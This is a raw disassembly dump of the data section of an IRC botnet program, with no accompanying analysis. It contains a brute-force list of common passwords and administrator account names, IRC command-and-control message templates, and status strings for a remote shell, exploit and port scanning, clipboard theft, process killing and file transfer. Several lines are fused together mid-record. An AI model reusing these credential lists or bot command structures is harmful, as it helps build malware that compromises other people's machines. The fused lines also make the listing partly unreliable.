aAlex db 'Alex',0 ; DATA XREF: .text:0042C514�o
align 10h
aAl3x db 'Al3x',0 ; DATA XREF: .text:0042C510�o
align 4
aAdministrate_0 db 'Administrateur',0 ; DATA XREF: .text:0042C508�o
align 4
aAdministrado_0 db 'Administrador',0 ; DATA XREF: .text:0042C504�o
align 4
aAdmin_0 db 'Admin',0 ; DATA XREF: .text:0042C500�o
align 10h
a88888888 db '88888888',0 ; DATA XREF: .text:0042C4FC�o
; .text:0042E418�o
align 4
a654321 db '654321',0 ; DATA XREF: .text:0042C4F8�o
; .text:0042E5E4�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:0042C4F4�o
; .text:0042E5E0�o
align 4
a2600 db '2600',0 ; DATA XREF: .text:0042C4F0�o
; .text:0042E5D4�o
align 4
a2002 db '2002',0 ; DATA XREF: .text:0042C4E8�o
; .text:0042E5C0�o
align 4
a123qwe db '123qwe',0 ; DATA XREF: .text:0042C4E4�o
; .text:0042E4E4�o
align 4
a123asd db '123asd',0 ; DATA XREF: .text:0042C4E0�o
; .text:0042E4E0�o
align 4
a123abc db '123abc',0 ; DATA XREF: .text:0042C4DC�o
; .text:0042E4DC�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:0042C4D8�o
; .text:0042E4E8�o
align 10h
a123467890 db '123467890',0 ; DATA XREF: .text:0042C4D4�o
; .text:0042E4B4�o
align 4
a12346789 db '12346789',0 ; DATA XREF: .text:0042C4D0�o
; .text:0042E4B0�o
align 4
a1234678 db '1234678',0 ; DATA XREF: .text:0042C4CC�o
; .text:0042E4AC�o
a123467 db '123467',0 ; DATA XREF: .text:0042C4C8�o
; .text:0042E4A8�o
align 4
a12346 db '12346',0 ; DATA XREF: .text:0042C4C4�o
; .text:0042E4A4�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .text:0042C4C0�o
; .text:0042E4A0�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .text:0042C4BC�o
; .text:0042E49C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0042C4B8�o
; .text:0042E498�o
a123456 db '123456',0 ; DATA XREF: .text:0042C4B4�o
; .text:0042E494�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0042C4B0�o
; .text:0042E490�o
align 10h
a1234 db '1234',0 ; DATA XREF: .text:0042C4AC�o
; .text:0042E48C�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:0042C4A8�o
; .text:0042E488�o
align 10h
a123 db '123',0 ; DATA XREF: .text:0042C4A4�o
; .text:0042E484�o
a121212 db '121212',0 ; DATA XREF: .text:0042C4A0�o
; .text:0042E480�o
align 4
a121 db '121',0 ; DATA XREF: .text:0042C49C�o
; .text:0042E47C�o
a12 db '12',0 ; DATA XREF: .text:0042C498�o
; .text:0042E478�o
align 4
a11111111 db '11111111',0 ; DATA XREF: .text:0042C494�o
; .text:0042E300�o
align 10h
a111111 db '111111',0 ; DATA XREF: .text:0042C490�o
; .text:0042E2F8�o
align 4
a111 db '111',0 ; DATA XREF: .text:0042C48C�o
; .text:0042E2EC�o
a110 db '110',0 ; DATA XREF: .text:0042C488�o
; .text:0042E44C�o
a1: ; DATA XREF: .text:0042C484�o
; .text:0042E2E4�o
unicode 0, <1>,0
a0wned db '0wned',0 ; DATA XREF: .text:0042C480�o
; .text:0042E2E0�o
align 4
a0wn3d db '0wn3d',0 ; DATA XREF: .text:0042C47C�o
; .text:0042E2DC�o
align 4
a007 db '007',0 ; DATA XREF: .text:0042C478�o
; .text:0042E2CC�o
a00000000 db '00000000',0 ; DATA XREF: .text:0042C474�o
; .text:0042E284�o
align 4
a000000 db '000000',0 ; DATA XREF: .text:0042C470�o
; .text:0042E280�o
align 4
a00000 db '00000',0 ; DATA XREF: .text:0042C46C�o
; .text:0042E27C�o
align 4
a0000 db '0000',0 ; DATA XREF: .text:0042C468�o
; .text:0042E278�o
align 4
a000 db '000',0 ; DATA XREF: .text:0042C464�o
; .text:0042E274�o
a00 db '00',0 ; DATA XREF: .text:0042C460�o
; .text:0042E270�o
align 4
asc_4335F4: ; DATA XREF: .text:0042C458�o
; .text:0042E1DC�o
unicode 0, <%>,0
a@_7 db '!@#$%^&*',0 ; DATA XREF: .text:0042C454�o
; .text:0042E1F8�o
align 4
a@_8 db '!@#$%^&',0 ; DATA XREF: .text:0042C450�o
; .text:0042E1F4�o
a@_9 db '!@#$%^',0 ; DATA XREF: .text:0042C44C�o
; .text:0042E1F0�o
align 4
a@_10 db '!@#$%',0 ; DATA XREF: .text:0042C448�o
; .text:0042E1EC�o
align 4
a@_11 db '!@#$',0 ; DATA XREF: .text:0042C444�o
align 4
aA_2: ; DATA XREF: .text:0042C438�o
; .text:0042C5C0�o ...
unicode 0, <a>,0
aZ_1: ; DATA XREF: .text:0042C434�o
; .text:0042E6D4�o
unicode 0, <z>,0
asc_43362C: ; DATA XREF: .text:0042C430�o
; .text:0042E13C�o ...
unicode 0, <x>,0
aAs db 'as',0 ; DATA XREF: .text:0042C42C�o
; .text:0042E6F0�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .text:0042C424�o
aOracle db 'oracle',0 ; DATA XREF: .text:0042C420�o
; .text:0042D738�o
align 10h
aDba db 'dba',0 ; DATA XREF: .text:0042C41C�o
aDatabase db 'database',0 ; DATA XREF: .text:0042C418�o
; .text:0042CB6C�o
align 10h
aDefault db 'default',0 ; DATA XREF: .text:0042C414�o
aGuest_0 db 'guest',0 ; DATA XREF: .text:0042C410�o
align 10h
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .text:0042C40C�o
; .text:0042E134�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .text:0042C408�o
; .text:0042DE20�o
aStudent db 'student',0 ; DATA XREF: .text:0042C404�o
; .text:0042DD3C�o
aOwner db 'owner',0 ; DATA XREF: .text:0042C400�o
align 4
aComputer db 'computer',0 ; DATA XREF: .text:0042C3FC�o
; .text:0042CA78�o
align 10h
aStaff db 'staff',0 ; DATA XREF: .text:0042C3F4�o
; .text:0042DCD8�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0042C3EC�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .text:0042C3E8�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .text:0042C3E4�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .text:0042C3E0�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:0042C3DC�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_4134AF:loc_4135BA�o
; .text:0042C3D8�o ...
align 4
aMirc1_7_99 db 'mirc 1.7.99',0 ; DATA XREF: .text:off_42C32C�o
a@room db '*@room',0 ; DATA XREF: .text:off_42C328�o
align 10h
dword_433700 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40C574+34D�o
dd 2029206Ch, 2BBBB02h, 6F422020h, 74732074h, 65747261h
dd 2E64h
dword_43372C dd 25207325h, 25222064h, 2273hdword_433738 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CA58+F2�o
dd 2029206Ch, 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40CBBE+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40CBBE+35�o
align 10h
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+5C7D�o
align 10h
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+5C68�o
align 10h
dword_4337B0 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5C54�o
dd 2029206Ch, 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 4
dword_4337E4 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5C37�o
dd 2029206Ch, 2BBBB02h
aPasswordAccept db ' Password accepted.',0
align 4
dword_433818 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5BE2�o
dd 2029206Ch, 2BBBB02h
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
align 4
dword_433858 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5B75�o
dd 2029206Ch, 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40CD3A+5B66�o
; sub_40CD3A+5BD3�o
align 4
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40CD3A+5B52�o
; sub_40CD3A+5BBF�o
align 4
asc_4338E4: ; DATA XREF: sub_40CD3A+5B22�o
unicode 0, <~>,0
dword_4338E8 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5AD1�o
dd 2029206Ch, 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 10h
dword_433920 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5A23�o
dd 2029206Ch, 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 10h
dword_433960 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5A18�o
dd 2029206Ch, 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 10h
dword_4339A0 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+59C7�o
dd 2029206Ch, 2BBBB02h, 73252020h, 2 dup(0)
unk_4339C8 db 2 ; DATA XREF: sub_40CD3A+59A3�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStar_6 db ' Failed to start secure thread, error: <%d>.',0
align 4
dword_433A18 dd 28026502h, 62302E31h, 20282029h, 75636573h, 6D2E6572h
; DATA XREF: sub_40CD3A+593F�o
dd 6C1F641Fh, 2202920h, 2002BBBBh, 20732520h, 74737973h
dd 2E6D65h
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40CD3A+5939�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_40CD3A+5932�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_40CD3A+58D7�o
aSecure db 'secure',0 ; DATA XREF: sub_40CD3A+58C6�o
align 4
unk_433A68 db 2 ; DATA XREF: sub_40CD3A+58A6�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Fh, 63h, 6Bh
db 73h ; s
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_7 db 'Failed to start server thread, error: <%d>.',0
dword_433AB4 dd 69026602h, 6966646Eh, 1F651F6Ch, 2E2Ehdword_433AC4 dd 646E6946h, 6C696620h, 65hdword_433AD0 dd 72027002h, 1F631F6Fh, 2E2Ehdword_433ADC dd 636F7250h, 20737365h, 7473696Ch, 0dword_433AEC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5733�o
dd 2029206Ch, 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h
dd 2E676Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A:loc_412460�o
align 10h
dword_433B30 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5711�o
dd 2029206Ch, 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh
dd 2E676E69h, 0
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A:loc_41243E�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+56DB�o
align 4
dword_433B84 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+568F�o
dd 2029206Ch, 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 4
dword_433BC4 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5651�o
dd 2029206Ch, 2BBBB02h, 6F422020h, 44492074h, 7325203Ah
dd 2Eh
dword_433BF0 dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A+5627�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
dword_433C3C dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A+55CE�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h, 694C2020h, 74207473h
dd 61657268h, 2E7364h
dword_433C6C dd 627573h dword_433C70 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5556�o
dd 2029206Ch, 2BBBB02h, 6C412020h, 20736169h, 7473696Ch
dd 2Eh, 0
dword_433CA0 dd 28026502h, 62302E31h, 20282029h, 2E676F6Ch, 1F641F6Dh
; DATA XREF: sub_40CD3A+5526�o
dd 2029206Ch, 2BBBB02h
aFailedToStar_8 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_433CEC dd 28026502h, 62302E31h, 20282029h, 2E676F6Ch, 1F641F6Dh
; DATA XREF: sub_40CD3A+54AF�o
dd 2029206Ch, 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h
dd 2E67h
dword_433D18 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5428�o
dd 2029206Ch, 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh
dd 2E6F66h
dword_433D44 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+53F9�o
dd 2029206Ch, 2BBBB02h, 79532020h, 6D657473h, 666E4920h
dd 2E6Fh
dword_433D70 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+53A4�o
dd 2029206Ch, 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh
dd 2E746Fh, 0
dword_433DA0 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A+5373�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToStar_9 db ' Failed to start listing thread, error: <%d>.',0
align 10h
dword_433DF0 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A+5314�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h, 72502020h, 6563636Fh
dd 6C207373h, 2E747369h, 0
aFull db 'full',0 ; DATA XREF: sub_40CD3A+52F4�o
align 4
dword_433E2C dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A+5292�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aAlreadyRunning db ' Already running.',0
align 10h
unk_433E60 db 2 ; DATA XREF: sub_40CD3A+5266�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 63h ; c
db 64h, 6Bh, 65h
db 79h ; y
db 73h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSearchComplete db ' Search completed.',0
align 4
dword_433E94 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5217�o
dd 2029206Ch, 2BBBB02h, 70552020h, 656D6974h, 7325203Ah
dd 2Eh
dword_433EC0 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_411EB4�o
dd 2029206Ch, 2BBBB02h
aRemoteShellRea db ' Remote shell ready.',0
align 4
dword_433EF4 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5173�o
dd 2029206Ch, 2BBBB02h
aCouldnTOpenRem db ' Couldn',27h,'t open remote shell.',0
align 10h
dword_433F30 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5157�o
dd 2029206Ch, 2BBBB02h
aRemoteShellAlr db ' Remote shell already running.',0
dword_433F6C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+5141�o
dd 2029206Ch, 2BBBB02h, 65472020h, 6C432074h, 6F627069h
dd 2E647261h, 0
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40CD3A+5113�o
align 10h
unk_433FB0 db 2 ; DATA XREF: sub_40CD3A:loc_411E3D�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 10h
unk_433FF0 db 2 ; DATA XREF: sub_40CD3A+50EE�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheFlushe db ' ARP cache flushed.',0
align 4
unk_434028 db 2 ; DATA XREF: sub_40CD3A:loc_411E0C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 4
unk_434068 db 2 ; DATA XREF: sub_40CD3A:loc_411E05�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 4
unk_4340A8 db 2 ; DATA XREF: sub_40CD3A+50C4�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDnsCacheFlushe db ' DNS cache flushed.',0
align 10h
unk_4340E0 db 2 ; DATA XREF: sub_40CD3A+5031�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_10 db 'Failed to start server thread, error: <%d>.',0
align 10h
unk_434130 db 2 ; DATA XREF: sub_40CD3A+4EBC�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_11 db 'Failed to start server thread, error: <%d>.',0
unk_43417C db 2 ; DATA XREF: sub_40CD3A+4DAF�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAlreadyRunni_0 db 'Already running.',0
align 10h
dword_4341B0 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A:loc_411AD3�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToSta_12 db ' Failed to start scan, port is invalid.',0
align 10h
dword_434200 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A+4CDA�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
dword_43427C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4A92�o
dd 2029206Ch, 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 4
dword_4342B4 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4A79�o
dd 2029206Ch, 2BBBB02h
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
dword_4342E8 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4A5C�o
dd 2029206Ch, 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
dword_43431C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4A46�o
dd 2029206Ch, 2BBBB02h, 52492020h, 61522043h, 25203A77h
dd 2E73h
dword_434348 dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A:loc_41170C�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 4
dword_434388 dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A+49CB�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 10h
dword_4343C0 dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A:loc_4116C8�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 4
dword_4343FC dd 28026502h, 62302E31h, 20282029h, 65726874h, 2E736461h
; DATA XREF: sub_40CD3A+4984�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 4
aAll db 'all',0 ; DATA XREF: sub_40CD3A+496A�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+48DF�o
; sub_40CD3A:loc_412427�o
align 4
dword_43444C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4869�o
dd 2029206Ch, 2BBBB02h
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_434484 db 2 ; DATA XREF: sub_40CD3A:loc_41158E�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCouldnTOpenF_0 db 'Couldn',27h,'t open file: %s',0
align 4
unk_4344BC db 2 ; DATA XREF: sub_40CD3A+484A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFileOpenedS db 'File opened: %s',0
dword_4344EC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4821�o
dd 2029206Ch, 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 4
dword_434524 dd 28026502h, 62302E31h, 20282029h, 2E736E64h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_41153F�o
dd 2029206Ch, 2BBBB02h
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 10h
dword_434560 dd 28026502h, 62302E31h, 20282029h, 2E736E64h, 1F641F6Dh
; DATA XREF: sub_40CD3A+47DA�o
dd 2029206Ch, 2BBBB02h
aLookupSS_ db ' Lookup: %s -> %s.',0
dword_434590 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A:loc_4114E0�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToTermin db ' Failed to terminate process: %s',0
align 4
dword_4345D4 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A+479C�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aProcessKilledS db ' Process killed: %s',0
align 10h
dword_434610 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A:loc_411486�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
align 4
dword_434658 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_40CD3A+4745�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aProcessKilledI db ' Process killed ID: %s',0
dword_434690 dd 28026502h, 62302E31h, 20282029h, 656C6966h, 641F6D2Eh
; DATA XREF: sub_40CD3A+46FE�o
dd 29206C1Fh, 0BBBB0220h, 44202002h, 74656C65h, 27206465h
dd 2E277325h, 0
dword_4346C0 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+46D3�o
dd 2029206Ch, 2BBBB02h
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
dword_43470C dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+467A�o
dd 2029206Ch, 2BBBB02h
aSendFileSUserS db ' Send File: %s, User: %s.',0
align 4
dword_434744 dd 28026502h, 62302E31h, 20282029h, 656C6966h, 641F6D2Eh
; DATA XREF: sub_40CD3A+4608�o
dd 29206C1Fh, 0BBBB0220h, 4C202002h, 3A747369h, 732520h
dd 0
unk_434770 db 2 ; DATA XREF: sub_40CD3A+45C9�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_13 db 'Failed to start connection thread, error: <%d>.',0
dword_4347C0 dd 28026502h, 62302E31h, 20282029h, 69736976h, 1F6D2E74h
; DATA XREF: sub_40CD3A+4570�o
dd 206C1F64h, 0BB022029h, 202002BBh, 3A4C5255h, 2E732520h
dd 0
dword_4347EC dd 28026502h, 62302E31h, 20282029h, 6372696Dh, 641F6D2Eh
; DATA XREF: sub_40CD3A:loc_411205�o
dd 29206C1Fh, 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh
dd 2E746E65h, 0
unk_43481C db 2 ; DATA XREF: sub_40CD3A+44C4�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Dh ; m
db 69h, 72h, 63h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
dword_43484C dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4487�o
